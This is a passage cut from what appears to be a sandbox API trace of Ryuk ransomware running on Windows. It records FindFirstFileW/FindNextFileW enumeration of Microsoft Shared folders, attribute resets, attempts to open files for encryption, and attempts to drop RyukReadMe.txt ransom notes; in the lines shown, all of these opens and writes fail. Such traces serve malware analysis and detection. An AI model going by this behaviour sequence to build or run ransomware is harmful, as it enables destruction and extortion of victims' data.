shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.542] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT", dwFileAttributes=0x80) returned 0 [0131.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.543] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.543] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", dwFileAttributes=0x80) returned 0 [0131.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.544] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", dwFileAttributes=0x80) returned 0 [0131.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.545] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", dwFileAttributes=0x80) returned 0 [0131.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.545] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", dwFileAttributes=0x80) returned 0 [0131.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.546] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.546] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", dwFileAttributes=0x80) returned 0 [0131.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.547] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG", dwFileAttributes=0x80) returned 0 [0131.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.547] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT", dwFileAttributes=0x80) returned 0 [0131.548] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.548] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.548] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.548] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT", dwFileAttributes=0x80) returned 0 [0131.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.549] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.549] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.549] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT", dwFileAttributes=0x80) returned 0 [0131.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.550] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.550] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.551] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.551] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.551] SetLastError (dwErrCode=0x0) [0131.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.554] GetLastError () returned 0x5 [0131.554] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.554] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.554] SetLastError (dwErrCode=0x0) [0131.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.554] GetLastError () returned 0x5 [0131.554] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.554] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.555] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.555] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.555] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.555] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.555] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.555] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.555] SetLastError (dwErrCode=0x0) [0131.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.555] GetLastError () returned 0x5 [0131.555] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.555] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.555] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.555] SetLastError (dwErrCode=0x0) [0131.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.556] GetLastError () returned 0x5 [0131.556] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.556] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.556] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.556] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.556] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", dwFileAttributes=0x80) returned 0 [0131.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.557] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.557] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.557] SetLastError (dwErrCode=0x0) [0131.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.557] GetLastError () returned 0x5 [0131.557] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.557] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.558] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.558] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.558] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.558] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.558] SetLastError (dwErrCode=0x0) [0131.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.558] GetLastError () returned 0x5 [0131.558] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.558] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.558] SetLastError (dwErrCode=0x0) [0131.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.559] GetLastError () returned 0x5 [0131.559] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.559] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.559] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.559] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.559] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.559] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.559] SetLastError (dwErrCode=0x0) [0131.559] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.559] GetLastError () returned 0x5 [0131.559] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.559] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", dwFileAttributes=0x80) returned 0 [0131.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.560] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.560] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.560] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.560] SetLastError (dwErrCode=0x0) [0131.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.560] GetLastError () returned 0x5 [0131.560] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.560] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.561] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.561] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.561] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.561] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.561] SetLastError (dwErrCode=0x0) [0131.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.561] GetLastError () returned 0x5 [0131.561] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.561] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.561] SetLastError (dwErrCode=0x0) [0131.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.561] GetLastError () returned 0x5 [0131.561] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.561] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.561] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.561] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.562] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.562] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.562] SetLastError (dwErrCode=0x0) [0131.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.562] GetLastError () returned 0x5 [0131.562] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.562] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.562] SetLastError (dwErrCode=0x0) [0131.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.562] GetLastError () returned 0x5 [0131.562] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.562] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.563] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.563] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.563] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.563] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.563] SetLastError (dwErrCode=0x0) [0131.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.563] 